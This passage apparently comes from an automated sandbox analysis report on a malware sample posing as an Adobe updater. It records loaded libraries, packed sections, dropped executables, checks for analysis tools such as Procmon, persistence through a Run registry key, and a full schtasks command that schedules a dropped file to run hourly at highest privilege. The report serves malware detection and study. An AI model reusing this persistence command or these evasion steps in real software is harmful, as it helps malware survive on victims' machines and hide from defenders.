            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: AdobeUpdaterV131.exeStatic file information: File size 2342912 > 1048576
            Source: AdobeUpdaterV131.exeStatic PE information: Raw size of czumqxku is bigger than: 0x100000 < 0x1a4a00
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeUnpacked PE file: 0.2.AdobeUpdaterV131.exe.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeUnpacked PE file: 1.2.xRp.exe.4e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 9.2.MPGPH131.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 10.2.MPGPH131.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 12.2.RageMP131.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 14.2.RageMP131.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeUnpacked PE file: 15.2.xRp.exe.e30000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: u
            Source: AdobeUpdaterV131.exeStatic PE information: section name:
            Source: AdobeUpdaterV131.exeStatic PE information: section name: .idata
            Source: AdobeUpdaterV131.exeStatic PE information: section name:
            Source: AdobeUpdaterV131.exeStatic PE information: section name: czumqxku
            Source: AdobeUpdaterV131.exeStatic PE information: section name: oiivdxoz
            Source: AdobeUpdaterV131.exeStatic PE information: section name: .taggant
            Source: AdobeUpdaterV131.exeStatic PE information: section name: u
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: czumqxku
            Source: MPGPH131.exe.0.drStatic PE information: section name: oiivdxoz
            Source: MPGPH131.exe.0.drStatic PE information: section name: .taggant
            Source: MPGPH131.exe.0.drStatic PE information: section name: u
            Source: xRp.exe.0.drStatic PE information: section name: .aspack
            Source: xRp.exe.0.drStatic PE information: section name: .adata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: .idata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: czumqxku
            Source: RageMP131.exe.0.drStatic PE information: section name: oiivdxoz
            Source: RageMP131.exe.0.drStatic PE information: section name: .taggant
            Source: RageMP131.exe.0.drStatic PE information: section name: u
            Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
            Source: MyProg.exe.1.drStatic PE information: section name: PELIB
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
            Source: SciTE.exe.1.drStatic PE information: section name: u
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006FC7B8 push ecx; ret 0_2_006FC7CB
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E1638 push dword ptr [004E3084h]; ret 1_2_004E170E
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E600A push ebp; ret 1_2_004E600D
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E2D9B push ecx; ret 1_2_004E2DAB
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E6014 push 004E14E1h; ret 1_2_004E6425
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B8C7B8 push ecx; ret 9_2_00B8C7CB
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B8C7B8 push ecx; ret 10_2_00B8C7CB
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_006CB4B0 push 00000000h; retf 12_2_006CB4B8
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_0069C7B8 push ecx; ret 12_2_0069C7CB
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_006CB4B0 push 00000000h; retf 14_2_006CB4B8
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_0069C7B8 push ecx; ret 14_2_0069C7CB
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E31638 push dword ptr [00E33084h]; ret 15_2_00E3170E
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E3600A push ebp; ret 15_2_00E3600D
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E36014 push 00E314E1h; ret 15_2_00E36425
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E32D9B push ecx; ret 15_2_00E32DAB
            Source: AdobeUpdaterV131.exeStatic PE information: section name: entropy: 7.980927554299119
            Source: AdobeUpdaterV131.exeStatic PE information: section name: czumqxku entropy: 7.951415630425814
            Source: AdobeUpdaterV131.exeStatic PE information: section name: u entropy: 6.933507194790652
            Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.980927554299119
            Source: MPGPH131.exe.0.drStatic PE information: section name: czumqxku entropy: 7.951415630425814
            Source: MPGPH131.exe.0.drStatic PE information: section name: u entropy: 6.933507194790652
            Source: xRp.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
            Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.980927554299119
            Source: RageMP131.exe.0.drStatic PE information: section name: czumqxku entropy: 7.951415630425814
            Source: RageMP131.exe.0.drStatic PE information: section name: u entropy: 6.933507194790652
            Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934511024885519
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.935286807883395
            Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.9346424707437535

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile created: C:\Users\user\AppData\Local\Temp\xRp.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 799
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
